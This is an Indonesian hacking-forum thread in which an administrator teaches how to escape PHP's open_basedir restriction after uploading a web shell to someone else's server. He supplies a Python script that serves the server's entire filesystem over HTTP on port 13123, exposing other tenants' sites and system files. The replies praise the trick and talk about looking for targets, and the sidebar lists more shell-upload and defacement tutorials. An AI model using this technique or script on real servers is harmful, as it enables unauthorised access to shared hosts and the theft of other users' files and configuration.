Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 05-22-2013, 07:20 PM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Hacking › Web Hacking v
« Previous 1 ... 7 8 9 10 11 ... 54 Next »

Part-1: Trik jumping di server yg pake open_basedir (trik pake python)

Home General Computer Multimedia Business Lounge

Pages (4): 1 2 3 4 Next »
Post Reply 
Tweet
Threaded Mode | Linear Mode
Part-1: Trik jumping di server yg pake open_basedir (trik pake python)
02-03-2012, 01:36 AM (This post was last modified: 02-07-2012 02:55 AM by ketek.)
Post: #1
ketek Offline
bocah ingusan
*******
Administrators
Posts: 2,168
Joined: Jan 2010
Reputation: 369
Part-1: Trik jumping di server yg pake open_basedir (trik pake python)
Salam devilzc0ders ketawa


kali ini ane mau membagi sedikit trik cupu untuk membypass server yg di set open_basedir nya, mungkin dah bnyk yg tau, hehehe, mungkin juga blum pada tau :-p

open_basedir itu sendiri adalah settingan pada php.ini yg bisa membatasi akses php pada folder tertentu, misalkan ane set seperti ini pada php.ini

Code:
open_basedir = /var/www/dono

maka kita tidak akan bisa membuka semua dir selain /var/www/dono dan semua file dan folder didalamnya...
jadi kita gak bisa buka misalnya tetangganya /var/www/kasino atau /var/www/indro ataupun /etc dll

baca lebih jelas tentang open_basedir disini
http://id.php.net/manual/en/ini.core.php...en-basedir


misal kita udah ada shell di /var/www/dono/b374k.php
nah truz kita buka tuh shell,
ternyata kita gak bisa ke folder2 lain karena di batasi menggunakan open_basedir nya php
[Image: fk1eyo.jpg]


nah klo ketemu yg kek gini ada berbagai macam solusinya
kali ini mari kita bypass menggunakan python,
jadi python harus bisa diakses dari shell punya kita, coba cek pake
Code:
python -h
klo keluar help nya itu berarti bisa kita lanjut coba,
klo python gak bisa diakses langkah selanjutnya gak akan bisa, nanti ane buatkan thread lainnya untuk bypass yg kyk gini klo python gak bisa
save script python berikut ini dengan nama misalnya webs.py

Code:
#!/usr/bin/env python
# devilzc0de.org (c) 2012
import SimpleHTTPServer
import SocketServer
import os

port = 13123

if __name__=='__main__':
    os.chdir('/')
    Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

    httpd = SocketServer.TCPServer(("", port), Handler)

    print("Now open this server on webbrowser at port : " + str(port))
    print("example: http://maho.com:" + str(port))
    httpd.serve_forever()
http://pastebin.com/vPFCVu7h

[Image: 205cjg3.jpg]

script tersebut diatas akan pindah ke root directory, lalu menjalankan SimpleHTTPServer yg listen pada port 13123

jalankan script python kita dengan perintah
Code:
python webs.py

[Image: 2je1wqq.jpg]

klo udah , biarin aja tabs nya loading gitu,
sekarang buka websitenya di port 13123
misalkan target nya http://jablay.com/
maka buka di http://jablay.com:13123

[Image: j5ifwm.jpg]
oke selamat bereksplorasi ketawa

[Image: ix5hck.jpg]

tambahan screenshot, request dari om bunga ketawa
[Image: 23urnfb.jpg]

sekian tutor cupu dari ane tersipu
Find all posts by this user
Quote this message in a reply
 Reputed by :  tabun(+1) , schumbag(+1) , tj4h_4n9on(+1) , ditatompel(+1) , eidelweiss(0) , teardrop(+1) , hakimoxz(+1) , cangcimen(+1) , akatsuchi(+1) , wenkhairu(+1) , adoet_t(+1) , p0pc0rn(+1) , ohara_inamiji(+1)
02-03-2012, 01:39 AM
Post: #2
tabun Offline
./Junk3r C4d3t
Posts: 1,774
Joined: Dec 2011
Reputation: 33
RE: Trik jumping di server yg pake open_basedir (trik pake python)
wkwkwkkw...
keren nih tutornya omz buket... smangat
ane izin pelajari dulu ya omz, blom dapet target soalnya.. malu
Find all posts by this user
Quote this message in a reply
02-03-2012, 01:40 AM
Post: #3
wahyu_devilzc0de™ Offline
Rest In Peace
***
Posts: 1,573
Joined: Dec 2009
Reputation: 191
RE: Trik jumping di server yg pake open_basedir (trik pake python)
mantrappp mantap jaya asik
Visit this user's website Find all posts by this user
Quote this message in a reply
02-03-2012, 01:40 AM
Post: #4
ketek Offline
bocah ingusan
*******
Administrators
Posts: 2,168
Joined: Jan 2010
Reputation: 369
RE: Trik jumping di server yg pake open_basedir (trik pake python)
asdasdasdadsada <-- gagal pertamax mewek
Find all posts by this user
Quote this message in a reply
02-03-2012, 01:45 AM
Post: #5
eidelweiss Offline
Devilzc0der
*****
DC Security Grup
Posts: 1,537
Joined: Mar 2010
Reputation: 69
RE: Trik jumping di server yg pake open_basedir (trik pake python)
setelah di run tuh script terus buka di browser dengan port yg telah di buat..

coba om screenshot isi dari dir /var/www piss
Visit this user's website Find all posts by this user
Quote this message in a reply
02-03-2012, 01:48 AM (This post was last modified: 02-03-2012 01:51 AM by ketek.)
Post: #6
ketek Offline
bocah ingusan
*******
Administrators
Posts: 2,168
Joined: Jan 2010
Reputation: 369
RE: Trik jumping di server yg pake open_basedir (trik pake python)
(02-03-2012 01:45 AM)eidelweiss Wrote:  setelah di run tuh script terus buka di browser dengan port yg telah di buat..

coba om screenshot isi dari dir /var/www piss

[Image: 23urnfb.jpg]

ketawaketawa
Find all posts by this user
Quote this message in a reply
02-03-2012, 01:51 AM
Post: #7
eidelweiss Offline
Devilzc0der
*****
DC Security Grup
Posts: 1,537
Joined: Mar 2010
Reputation: 69
RE: Trik jumping di server yg pake open_basedir (trik pake python)
(02-03-2012 01:48 AM)xɛTɜx Wrote:  
(02-03-2012 01:45 AM)eidelweiss Wrote:  setelah di run tuh script terus buka di browser dengan port yg telah di buat..

coba om screenshot isi dari dir /var/www piss

[img

ketawaketawa

[img <= apaan begini doang nohope

cambuk
Visit this user's website Find all posts by this user
Quote this message in a reply
02-03-2012, 01:52 AM (This post was last modified: 02-03-2012 01:54 AM by ditatompel.)
Post: #8
ditatompel Offline
Administrator
*******
Administrators
Posts: 2,168
Joined: Dec 2010
Reputation: 367
RE: Trik jumping di server yg pake open_basedir (trik pake python)
mantap abgan banget nih... mimisan
Ditunggu tutorial bypassnya klo pythonnya kaga bisa di run om.. smangat
Find all posts by this user
Quote this message in a reply
02-03-2012, 01:53 AM
Post: #9
ketek Offline
bocah ingusan
*******
Administrators
Posts: 2,168
Joined: Jan 2010
Reputation: 369
RE: Trik jumping di server yg pake open_basedir (trik pake python)
wakakaka sorry, sambil makan ngakak tu udah dibenerin
Find all posts by this user
Quote this message in a reply
02-03-2012, 02:58 AM
Post: #10
badwolves1986 [RJ] Offline
Staf Registrasi DIC
RJ
Posts: 2,881
Joined: Oct 2010
Reputation: 91
RE: Trik jumping di server yg pake open_basedir (trik pake python)
wah keren bg ketek ane ijin bookmark buat belajar
Find all posts by this user
Quote this message in a reply
« Next Oldest | Next Newest »
Pages (4): 1 2 3 4 Next »
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  [Tutor] Hunting Windows Server+Upload Shell Via phpmyadmin using Computer Search Engine tey 18 687 05-19-2013 02:28 PM
Last Post: GuestMac
Bug [Tutor] Jumping server kompas,10 up got rooted!! KotoM 70 1,544 05-18-2013 01:05 AM
Last Post: KotoM
Rainbow Windows Server Mass Deface facl3ss 6 242 05-13-2013 02:49 PM
Last Post: ibnoeabdulaziz
  SQL Injection "detail_prod" server luxembourg [dc]zombierss[dc] 30 469 03-17-2013 11:41 AM
Last Post: Rifaldi238
  [Tutor] 4 trik Cara Upload Shell di Joomla ./E1nzte1N 21 483 02-23-2013 07:42 PM
Last Post: Rifaldi238
  bypass disable php function, disable cgi python, cgi perl di target ev1lut10n 12 664 02-22-2013 04:15 AM
Last Post: aliend
Wink [Tutor] pentest web dengan python flazer404 45 2,103 02-18-2013 03:47 PM
Last Post: Lintang27™
  ask root server web Backtracktux 17 284 02-15-2013 10:58 AM
Last Post: ciblex21
Big Grin [Ask] Server gak bisa di Symlink sama Config tebe4rt 14 327 12-02-2012 10:38 AM
Last Post: Regel
  [Tutor] bypass open_basedir dengan perl interpreter lokal Regel 10 426 10-24-2012 07:12 PM
Last Post: leftbehind

Users Browsing

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 05-22-2013, 07:20 PM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE